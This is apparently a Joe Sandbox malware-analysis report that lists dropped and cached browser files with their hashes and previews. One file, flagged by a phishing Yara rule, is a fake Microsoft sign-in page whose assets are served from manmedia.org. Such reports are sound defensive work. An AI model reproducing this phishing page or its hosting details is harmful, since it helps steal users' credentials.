                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cds.s5x3j6q5.hwcdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, mscomajax.vo.msecnd.net, audownload.windowsupdate.nsatc.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, cs22.wpc.v0cdn.net, ajax.googleapis.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, aadcdnoriginneu.azureedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, aadcdnoriginneu.ec.azureedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, cds.j3z9t3p6.hwcdn.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                  • VT rate limit hit for: https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d

                                                  Simulations

                                                  Behavior and APIs

                                                  No simulations

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{835A355E-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):32344
                                                  Entropy (8bit):1.7941220937304676
                                                  Encrypted:false
                                                  SSDEEP:96:rJZaZJ2aWftwAfvSe1M82TBHQveLBqMvOD2:rJZaZJ2aWft7fvxMFB1sMW2
                                                  MD5:2376B63DD99A21BB38F9BF23ACF1D86C
                                                  SHA1:F3EE9ACBD213872987FA5432050FF271892F187D
                                                  SHA-256:D6A1B3F79D7C3407BA8B9B9CD25757A3E5812170895353CE52ED68F68510277F
                                                  SHA-512:8E1E94D2B840E1EC005F547CB8382B3DE37B08B788F014B49ED24C80B9CB80025643E15E59990BC6BA5E54E300D8776B2572CE9664D6BC79CC672B8A784DC065
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8DE2B5D7-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):53336
                                                  Entropy (8bit):1.9851223060293122
                                                  Encrypted:false
                                                  SSDEEP:192:rTZwZe2BWCltCxfClLtCl08oyWCy0sYCc0qSCccxtCccNHiLC/cpLCLc5CCLHX2g:rVgVwwOMhxxY5S8a0JLFC9HTi7QTO
                                                  MD5:962274CC1F282531B23203E04357D3FF
                                                  SHA1:6DD72F23F4756D263D6B9880C1D8C3B8D49C1801
                                                  SHA-256:5109A8E77C833CE179D130F375178104C0DE5B989E86CDC3F2512FD41DB3E4EC
                                                  SHA-512:3464C97D984F866A41EC912724AE976E685A982B8698D46ECFF733BDA41C2A531400AC777AA55AED2666CF4AE374EFD0539020DA86A995C8CCD129C1D993A196
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{835A3560-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):19032
                                                  Entropy (8bit):1.5948619844744936
                                                  Encrypted:false
                                                  SSDEEP:48:IwHGcpryGwpaGG4pQWGrapbSqGQpBHGHHpcGTGUpQwlGcpm:rtZ6Q26YBSSjy2W6yg
                                                  MD5:FE6D8E055CF9717ED85F88E719780F49
                                                  SHA1:1E2B740098CFA100B8A1102F04976CE25B481195
                                                  SHA-256:F5D66DB73B3C4FFD1F6576A80E5A7B4772674184347BC82C0397063F64B1ACB7
                                                  SHA-512:554DE6C13F63040DA95E51AD26D81944201566DBFD45002A7E9FB49DF24515489E1A4EF392415738524AAF8D454AC4C575BF13E2676DA5616AAED960D8E56C87
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8DE2B5D9-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):28278
                                                  Entropy (8bit):2.1178792382736584
                                                  Encrypted:false
                                                  SSDEEP:96:rhZWQSeK1W6VWJC9o8/InnIIHnIm3pZr3wBq9ftr:rhZWQSeKk6EJC9o8/InnhHnrpZjltr
                                                  MD5:4CA8594CFF927437BF6C362441A1076E
                                                  SHA1:EF5D5F3EA6921532416F9F11F896F548B5C59521
                                                  SHA-256:0A019F360D7F50BED6A4A7167FBB8F259719AD3AD056743C95CE43B3D7F3551B
                                                  SHA-512:D3BE21DC29B842C29967E012D80946D7ABCAC2EE48769B576C0DE4BCFA0ABF07A56A04E502CF5220DD07CBBF1EF27A03B19A83973A2481E6B2E6920280C95CA9
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99A12787-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):28278
                                                  Entropy (8bit):2.12104244892328
                                                  Encrypted:false
                                                  SSDEEP:96:rVPZHqQieu1WQVWjCDoc/MnyIxHyIm3kZr3SBqxMtr:rBZKQieukQEjCDoc/MnykHyrkZjwtr
                                                  MD5:8ECC059DB7B7A31E416156DB10FB5F84
                                                  SHA1:87C27E185997DBDE9CC312AB57EF2B63121D386A
                                                  SHA-256:622525EC9D53C63D863BCF423B6CAE7F2BAFD3CB85B1207E6F4BB868FD785FDB
                                                  SHA-512:C9C0776427D6587266A15F91B382AC070FC1B1D05EB215A4F8EA703551A6BC46F123F9AE1A81E1767A4EECDF3ED53316ADF98CC04448F47E01B957C9BA2F2458
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99A12788-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):27998
                                                  Entropy (8bit):2.122018630942539
                                                  Encrypted:false
                                                  SSDEEP:96:rXZIQaeK1WUHP2vwWo434uIOYuIm3kZr37BqQxtr:rXZIQaeKkUHP2vwT434uDYurkZjntr
                                                  MD5:1AD682CA83D8C4403BDE9044255EF56F
                                                  SHA1:7C7C3A56DC6F7EAB23051BE9D7808EFFA7AD97C8
                                                  SHA-256:04CF35A9D86D9FF37FFC5C0D083E8478E6D499C7DA1987FD8AB71CC9CD8C95B9
                                                  SHA-512:EAF6CCF3A8A70FC73D7476BAD1182B282CAB0ECF86A249C30BFF362D992CB5EDABDBA2D58F3F6BB9E497F0D74371C0B1047F587A3C923F73410B0A6D064FEE81
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A0830FD3-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):16984
                                                  Entropy (8bit):1.5643524552422585
                                                  Encrypted:false
                                                  SSDEEP:48:IwTGcprWhGwpanG4pQfGrapbSU7GQpK6G7HpRYTGIpG:rpZuQJ6jBSU1AVT8A
                                                  MD5:5D470E0EFBEB7860B03120EF2857313B
                                                  SHA1:F84CE169B659DDAEC3A17574F845303D9D03E44A
                                                  SHA-256:8D3EF8C21AD52E5F6CE7F46FFF8DDD4FA4A256504353495ED9079DEA8FBC5F6E
                                                  SHA-512:6B4E40C822D9FBC1C6E4E71529DE5F89D5CB3B14D9C479F2E9E6213CD104A9C3B34099715601F0864CF65B73C446C280B84242589932CB692673EF64872BFF1A
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\favicons[1].png
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):492
                                                  Entropy (8bit):7.443140866786406
                                                  Encrypted:false
                                                  SSDEEP:12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
                                                  MD5:3CA64F83FDCF25135D87E08AF65E68C9
                                                  SHA1:B82D0979D555BD137B33C15021129E06CBEEA59A
                                                  SHA-256:2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
                                                  SHA-512:7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://www.google.com/s2/favicons?sz=64&domain_url=murexltd.com
                                                  Preview: .PNG........IHDR................a....IDATx.b...?E........;C..i[PI....>......(.1.c..b...d..m.m';]...W{...S......+..'.}..X........~...N..1...E...S1E..O.PX\..C...o]<.........[.T..d.Rm..u.n.....<........:...#.P..c.*2....g.....!...>v.:...#...J..d.xx."..x._=....k...!.!!;@.....+.{`..+.....gk.....@N..-@.X.q......K...'..@@)...........&.w.......%..<&.N.._x.G`c..F%L.eC.80H`L...#Z..F....e.......L.H...L.&a..5.0..V4N..m..........$.......(..b{....8a.L.a.BM....0.....IEND.B`.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\popper.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):20495
                                                  Entropy (8bit):5.217693761954058
                                                  Encrypted:false
                                                  SSDEEP:384:f5LFrVVVnCQvIR/CFU4hHPV4kdxXvYqo2D75zCx+vI2am3MxGpGTgd/9jt9+Db9A:hNVVVnyiU41xXvlD7wx+v0xyGTgnZO9A
                                                  MD5:6B08DDC901000D51FA1F06A35518F302
                                                  SHA1:BAFE987C18CBE0587DE3E6360E7DA40A2885614B
                                                  SHA-256:02835066969199E9924F1332F7172A5D7E552F023A20C3D8BA03BB6C51CE5BE5
                                                  SHA-512:7A97FA1CF4A12D0F338090F8A4FFAD48D91843D6955304DE5F6208DE394642B0B412D6FD30D7A880CAD92200A8F7F2005C40324BCCE3CFEDA7B14A57DFF098CA
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js
                                                  Preview: /*. Copyright (C) Federico Zivolo 2018. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function r(e){if(!e)return document.documentElement;for(var o=ie(10)?document.body:null,n=e.offsetParent;n===o&&e.nextElementSibling;)n=(e=e.nextElementSibling).offsetParent;var i=n&&n.nodeName;return i&&'BODY'!==i&&'HTM
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\style[1].css
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):16331
                                                  Entropy (8bit):5.319200830403511
                                                  Encrypted:false
                                                  SSDEEP:192:yqVC6VfZfqZp+VvNmdW3WcWY6TLMPbUZ70PIj+IgUgX9aG+0F4jwvUZIhAjwGpP+:y36Zf6kmv7Hvo9Z+0WjwIIh5GZRgf
                                                  MD5:3BD33314562B431BB47EF0CCB7ECCC62
                                                  SHA1:93171B5D03DA9D63AC3BA80187159A9F9D5022D6
                                                  SHA-256:D95C9920A34DF7714EADB1257094981FDD5A596D2B1C80E3A9278F02D1AEE9A1
                                                  SHA-512:2A4857C5B4E4F632C9252EF8922BB3B0399883C7273A58BBC0E6A73094165B0EEE8BA2A2A5CAEEFBE6C335ECD1DCE9473500DDA0C4B8DEA9F60FFE973DF94627
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://manmedia.org/offic/n.page/style.css
                                                  Preview: color{...color:rgba(196,91,219,0.1);...color:rgba(196,91,219,0.2);...color:rgba(196,91,219,0.3);...color:rgba(196,91,219,0.4);...color:rgba(196,91,219,0.5);...color:rgba(196,91,219,0.6);...color:rgba(196,91,219,0.7);...color:rgba(196,91,219,0.8);...color:rgba(196,91,219,0.9);...color:rgba(196,91,219,1);......background-color:-webkit-gradient(linear, 0 0, 0 100%, from(#ffffff), color-stop(25%, #ffffff), to(#e6e6e6));...background-color:-webkit-linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);...background-color:-moz-linear-gradient(top, #ffffff, #ffffff 25%, #e6e6e6);...background-color:-ms-linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);...background-color: linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);...filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#e6e6e6', GradientType=0);.........}....html, body, div, span, applet, object, iframe,..h1, h2, h3, h4, h5, h6, p, blockquote, pre,..a, abbr, acronym, address, big, cite, code,..del, dfn, em, img, i
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):255366
                                                  Entropy (8bit):6.093517370301889
                                                  Encrypted:false
                                                  SSDEEP:6144:SWqmT2RmEb2oUp9M5WnwGJUQo7xKOFqqbgvHzy8H0WqmT2RmEb2oUp9M5WnwGJUh:8WM5LGk1kcWM5LGk1km
                                                  MD5:99A747B517553FEDEA4E383A3B257FB3
                                                  SHA1:A1CED03F68CAFEEAED72CC4184788109B1500954
                                                  SHA-256:FC09B0D19EE905B6CDEC8D0FC94ED424EDBA006BE87F702834D85176E703BE12
                                                  SHA-512:04D37CEFDBA3998BC71ECBBCF2CDBB4E9F6FDD10A2E27E1A8B57FDAA19546DC49851D58A0ABB0A57A31B1F43C793AADBF567D423F8997A694547DF88C88A10B8
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html, Author: Joe Security
                                                  Reputation:low
                                                  Preview: ....<html dir="ltr" class="" lang="en">....<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. <meta name="PageID" content="ConvergedSignIn">.. <meta name="SiteID" content="">.. <meta name="ReqLC" content="1033">.. <meta name="LocLC" content="en-US">.. <meta name="title" content="ES6-CrawlerDetect">.. .... <link rel="shortcut icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">..<link rel="stylesheet" href="https://manmedia.org/offic/n.page/style.css" />.. <meta name="robots" content="none">..<script type="text/javascript" src="https://manmedia.org/of
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\bootstrap.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):50676
                                                  Entropy (8bit):5.276454699305197
                                                  Encrypted:false
                                                  SSDEEP:768:D2Ybgh0GBxTHVmcmjWSLsynS/zZ/AcyUenY8yiKKdHPPm26Ro1FH4nx46:D2jh02Lh+SbZ/AbYqdm2mx46
                                                  MD5:CE6E785579AE4CB555C9DE311D1B9271
                                                  SHA1:5EF2C15B47D7290698C737676BA9C3056B45F2E8
                                                  SHA-256:0BCA10549DF770AB6790046799E5A9E920C286453EBBB2AFB0D3055339245339
                                                  SHA-512:A601871568C1B5B2874D30D6E5BB8667D994D2719FC4D6AF7F99162BF39DDAE800FFFF45B8C1C0BA790088C7B98DE2FFE565B5AF4531C0A8BA0F92E930E243DF
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js
                                                  Preview: /*!. * Bootstrap v4.1.0 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,c){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function o(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function h(r){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{},e=Object.keys(s);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(s).filter(function(t){return Object.getOwnPropertyDescriptor(s,t).enum
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\jquery-3.3.1.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):86927
                                                  Entropy (8bit):5.289226719276158
                                                  Encrypted:false
                                                  SSDEEP:1536:jLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6t3:5kn6x2xe9NK6nC69
                                                  MD5:A09E13EE94D51C524B7E2A728C7D4039
                                                  SHA1:0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
                                                  SHA-256:160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
                                                  SHA-512:F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js
                                                  Preview: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\jquery-3.3.1.slim.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):69917
                                                  Entropy (8bit):5.290926894311774
                                                  Encrypted:false
                                                  SSDEEP:1536:hLiMgk2gULYoXUmZx6+VWNL0kC8W90qU9JR7hDqEDqWSNB1gZFy/HG+FP:I8w0qU9JTtH3aP
                                                  MD5:99B0A83CF1B0B1E2CB16041520E87641
                                                  SHA1:BC5836992C0B260496BA520FE1336D499BF06EB7
                                                  SHA-256:DDE76B9B2B90D30EB97FC81F06CAA8C338C97B688CEA7D2729C88F529F32FBB1
                                                  SHA-512:33EA8C2353C745C61C3A927378995A59B555C76249C8F23065AB3CA2BEDD73DECB64EA248EF6E97D1C729A156D9492F28E2177C06CABD0524E0380CB38D2D52F
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://code.jquery.com/jquery-3.3.1.slim.min.js
                                                  Preview: /*! jQuery v3.3.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,u=n.push,s=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,d=f.toString,p=d.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},v=function e(t){return null!=t&&t===t.window},y={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in y)n[i]&&(o[i]=n[i]);t.head.a
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\favicons[1].png
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):492
                                                  Entropy (8bit):7.443140866786406
                                                  Encrypted:false
                                                  SSDEEP:12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
                                                  MD5:3CA64F83FDCF25135D87E08AF65E68C9
                                                  SHA1:B82D0979D555BD137B33C15021129E06CBEEA59A
                                                  SHA-256:2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
                                                  SHA-512:7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .PNG........IHDR................a....IDATx.b...?E........;C..i[PI....>......(.1.c..b...d..m.m';]...W{...S......+..'.}..X........~...N..1...E...S1E..O.PX\..C...o]<.........[.T..d.Rm..u.n.....<........:...#.P..c.*2....g.....!...>v.:...#...J..d.xx."..x._=....k...!.!!;@.....+.{`..+.....gk.....@N..-@.X.q......K...'..@@)...........&.w.......%..<&.N.._x.G`c..F%L.eC.80H`L...#Z..F....e.......L.H...L.&a..5.0..V4N..m..........$.......(..b{....8a.L.a.BM....0.....IEND.B`.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\jquery.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):93868
                                                  Entropy (8bit):5.372204012865564
                                                  Encrypted:false
                                                  SSDEEP:1536:k5RKUpVgklsdbuLP/l+0fGzA8gmtasgx/c9Rzzi4yff8qeLvHHEjam7rSnmBn9gn:Ee8FbGzA81+xRRi1Z3
                                                  MD5:DDB84C1587287B2DF08966081EF063BF
                                                  SHA1:9EB9AC595E9B5544E2DC79FFF7CD2D0B4B5EF71F
                                                  SHA-256:88171413FC76DDA23AB32BAA17B11E4FFF89141C633ECE737852445F1BA6C1BD
                                                  SHA-512:0640605A22F437F10521B2D96064E06E4B0A1B96D2E8FB709D6BD593781C72FF8A86D2BFE3090BC4244687E91E94A897C7B132E237D369B2E0DC01083C2EC434
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
                                                  Preview: /*! jQuery v1.7.1 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRequest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\jqueryLib[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):86663
                                                  Entropy (8bit):5.368302777291146
                                                  Encrypted:false
                                                  SSDEEP:1536:TNhEyjjTikEJO4edXXe9J578go6MWX2xkjde4c4j2ll2AckaXE46n15HZ+FhFcQ+:Vxc2yji4j2uC/kcQDU8CuE
                                                  MD5:473957CFB255A781B42CB2AF51D54A3B
                                                  SHA1:67BDACBD077EE59F411109FD119EE9F58DB15A5F
